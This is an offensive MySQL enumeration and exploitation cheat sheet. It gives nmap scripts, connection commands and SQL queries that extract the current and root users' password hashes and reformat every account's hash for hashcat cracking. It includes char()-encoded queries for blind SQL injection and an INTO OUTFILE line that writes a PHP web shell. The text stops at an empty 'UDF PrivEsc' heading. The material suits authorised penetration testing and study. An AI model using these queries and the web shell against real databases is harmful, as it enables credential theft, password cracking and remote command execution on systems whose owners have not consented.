
MySQL enumeration and exploitation

Initial enumeration

nmap -vv -p 3306 -sT --script=+mysql* <ip>

Connecting to a MySQL database

  • Connect using the mysql client (no space between -p and the password; omit the password to be prompted for it):
mysql -u <username> -p<password> -h <ip> -P 3306 <database>
  • Connect using mysqlsh over X Protocol (listens on 33060 by default, separate from the classic 3306 port):
mysqlsh --mysqlx -u <username> -p<password> -h <ip> -P 33060 -D <database>

Enumerating a database

  • Get version:
SELECT @@version;
  • Get current database:
SELECT database();
  • Get current user:
SELECT current_user();
  • Get the current user's password hash (current_user() returns user@host, so it is split on '@' to match the user and host columns of mysql.user):
SELECT password FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- MySQL < 5.7 and MariaDB: the hash is in the password column
SELECT authentication_string FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- MySQL >= 5.7: the password column is gone, the hash is in authentication_string
SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- caching_sha2_password hash ($A$005$<20 salt bytes><43-char digest>) rewritten as $mysql$A$005*<hex salt>*<hex digest> for hashcat mode 7401. Prefer this form: the salt is raw binary, so copying the column as text corrupts it.
  • List all users:
SELECT user FROM mysql.user ORDER BY 1;
  • Get the root user's password hash (lower(user) so that ROOT matches as well):
SELECT password FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. MySQL < 5.7 and MariaDB: the hash is in the password column
SELECT authentication_string FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. MySQL >= 5.7
SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- root's caching_sha2_password hash encoded for hashcat mode 7401, as above. Prefer this form when the hash contains non-ASCII (binary salt) bytes.
  • List tables:
SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1;
  • List table columns (the same table name can exist in several schemas, so keep table_schema in the output or add AND table_schema='<db>'):
SELECT table_schema,column_name FROM information_schema.columns WHERE table_name='<table_name>' ORDER BY 1,2;
  • Search for tables whose name contains "user" (the char() concat builds '%user%' without quotes; LIMIT 1 OFFSET n returns one row at a time, increment OFFSET to walk the list in a blind injection):
SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE concat(char(37),char(117),char(115),char(101),char(114),char(37)) ORDER BY 1 LIMIT 1 OFFSET 0;
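The hash queries above pull one account at a time and only cover the hashcat 7401 encoding. The query below is an added example, not part of the original cheat sheet: it lists every account with the hashcat mode and input string its authentication plugin calls for. It assumes MySQL 5.7 or later (authentication_string and plugin columns in mysql.user). mysql_native_password stores '*' followed by 40 hex characters and hashcat mode 300 takes those 40 characters without the asterisk; caching_sha2_password is rewritten for mode 7401 exactly as in the queries above; any other plugin is left hex-encoded with no mode.

```sql
-- Added example, not part of the original cheat sheet.
-- Assumes MySQL >= 5.7: hashes live in mysql.user.authentication_string and the
-- plugin column names the scheme. Accounts with an empty authentication_string
-- (passwordless or externally authenticated) are skipped.
SELECT user,
       host,
       plugin,
       CASE plugin
         -- '*' + SHA1(SHA1(pw)) as 40 hex chars; hashcat -m 300 wants only the 40 hex chars
         WHEN 'mysql_native_password' THEN substring(authentication_string, 2)
         -- '$A$005$' + 20 raw salt bytes + 43-char digest; hashcat -m 7401 wants
         -- $mysql$A$005*<salt as hex>*<digest as hex>: hex everything after the 7th
         -- character and insert the '*' after the 40 hex chars of salt
         WHEN 'caching_sha2_password' THEN concat('$mysql',
                                                 left(authentication_string, 6),
                                                 '*',
                                                 insert(hex(substring(authentication_string, 8)), 41, 0, '*'))
         -- anything else (sha256_password, auth_socket, ...): keep the raw bytes, hex-encoded
         ELSE hex(authentication_string)
       END AS hashcat_input,
       CASE plugin
         WHEN 'mysql_native_password' THEN 300
         WHEN 'caching_sha2_password' THEN 7401
         ELSE NULL
       END AS hashcat_mode
FROM mysql.user
WHERE authentication_string <> ''
ORDER BY user, host;
```

Run one hashcat job per distinct hashcat_mode, feeding it the matching hashcat_input values; rows with a NULL mode need manual handling.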

Saving anything to a file

  • INTO OUTFILE needs the FILE privilege and is confined by secure_file_priv (NULL disables file writes, a path restricts them to that directory, an empty value allows any directory the mysqld OS user can write to; packaged MySQL 5.7+ installs default to /var/lib/mysql-files). The data directory, usually /var/lib/mysql, is always writable by mysqld, which is why it is the fallback target; the file is owned by the mysqld user, so a web shell there only helps if something will serve or execute it:
select '<?php system($_GET[\'c\']); ?>' into outfile '/var/lib/mysql/cmd.php';

UDF PrivEsc